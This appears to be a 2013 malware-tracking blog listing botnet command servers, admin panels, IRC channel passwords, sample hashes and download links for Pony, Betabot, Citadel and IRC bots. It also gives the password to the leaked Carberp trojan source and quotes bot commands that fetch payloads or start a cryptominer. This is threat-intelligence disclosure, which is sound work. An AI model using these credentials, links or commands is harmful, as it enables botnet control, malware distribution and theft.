Resolved zbraaadanstfesse.org to 188.8.131.52 Server: zbraaadanstfesse.org Gate file: /p/stats.php This is currently being downloaded by this citadel net. This is also a backup domain for a betabot, and is the domain currently used by it. Betabot login: hxxp://zbraaadanstfesse.org/~.poto/login.php Related md5s (Search on malwr.com for samples): 7ec71449228f4209b9df59bb68ec3a5f Hosting infos: http://whois.domaintools.com/184.108.40.206
x.fullhdizle.co (Irc botnet hosted by hostforweb.net)
Resolved x.fullhdizle.co to 220.127.116.11 Server: x.fullhdizle.co Port: 1989 Server password: r00t33 Channel: #xxx Channel password: r00t33 Topic for #xxx is: !open hxxp://www.fullhdizle.coTopic for #xxx set by Coder at Wed Jun 26 14:02:37 2013 Related md5s (search on malwr.com to download the samples): 8cbdc21108b468ecd95644f18b83324d Hosting infos: http://whois.domaintools.com/18.104.22.168
22.214.171.124 (Athena irc botnet hosted by hostkey.com)
Server: 126.96.36.199 Port: 6667 Current local users 436, max 2038 Channel: #network #network 411 Related md5s (search on malwr.com to download the samples): 891905810486c6dee6d246f9845fb5cd Hosting infos: http://whois.domaintools.com/188.8.131.52
Carberp The Banking Trojan Source Now Available To Public
First Zeus now Carberp source are leaked to public Picture from dk forum Source and passwd for the rar archive are available via twitter thnx to ivanlef0u Another link for the source here(around 1.88GB) Password for the archive: “Kj1#w2*LadiOQpw3oi029)K Oa(28)uspeh”
184.108.40.206(Pony hosted in Hong Kong Hong Kong Unit 1702 Ramada Tower)
Admin Panel: 220.127.116.11/pfx/admin.php The rest of files are here: hxxp://18.104.22.168/pfx/ setup.php is still in this folder Pony sample: hxxp://22.214.171.124/pn1.exe hosting infos: http://whois.domaintools.com/126.96.36.199
srv1.su (Betabot http botnet hosted by softronics.ch)
Resolved srv1.su to 188.8.131.52 Server: srv1.su Gate file: /b/order.php Everyone should congratulate snk, who has taken his first baby steps into the 21st century by using a http bot. Unfortunately for him he chose to use the l33t Hackforums bot Betabot with a 1mb stub Autoit crypter, but I guess he can only manage toRead more...
184.108.40.206 (Pony loader hosted by infobox.ru)
Server: 220.127.116.11 Gate file: /Panel/gate.php Related md5s (search on malwr.com to download the samples): 160419b4c5f8415b41fb23e99be12b19 Hosting infos: http://whois.domaintools.com/18.104.22.168
srv1.su(snk’s botnet hosted in Luxembourg Steinsel Root Sa)
The bot is downloaded by this autoit sample: hxxp://sglegacy.com/AA/dava.exe wich looks like http autoit downloader login here: hxxp://www.sglegacy.com/AA/index.php/login another sample downloaded from the dava.ese is this: hxxp://la-majeur.com/images/beta.exe( Betabot) here dava.exe decompiled: $at2 = "0" $at5 = 0 $at1 = "0" $at3 = "0" $avm = "0" $asb = "0" $at4 = "0" #NoTrayIcon #Region #AutoIt3Wrapper_UseUpx=nRead more...
belakey.com(Pony hosted in Germany Gunzenhausen Osauhing Future Technologies)
Resolved : [belakey.com] To [22.214.171.124] Pony Gate: belakey.com/pony/gate.php Admin Panel: hxxp://belakey.com/pony/admin.php Sample: hxxp://126.96.36.199/z/pony4.exe hosting infos: http://whois.domaintools.com/188.8.131.52
y.osej36.com (Irc botnet hosted by gandi.net)
Resolved y.osej36.com to 184.108.40.206 Server: y.osej36.com Port: 80 Server password: passwd Channel: #root Channel password: redem !NAZEL hxxp://www12.0zz0.com/2013/06/21/20/723860853.png a392564eae140562e4b27d0ab078ba1e !NAZEL hxxp://upload.tehran98.com/img1/9kxogpyfckk2xwuzzn6j.png a392564eae140562e4b27d0ab078ba1e !s -n A modified ircd is used, so you may have trouble connecting. Alternate domains: y.v23sdy.com y.rwt234.com Bitcoin mining info: minerd.exe -a scrypt -s 20 –no-longpoll -q -o za.oisdj.com:443 -u anonymous.1 -p -xRead more...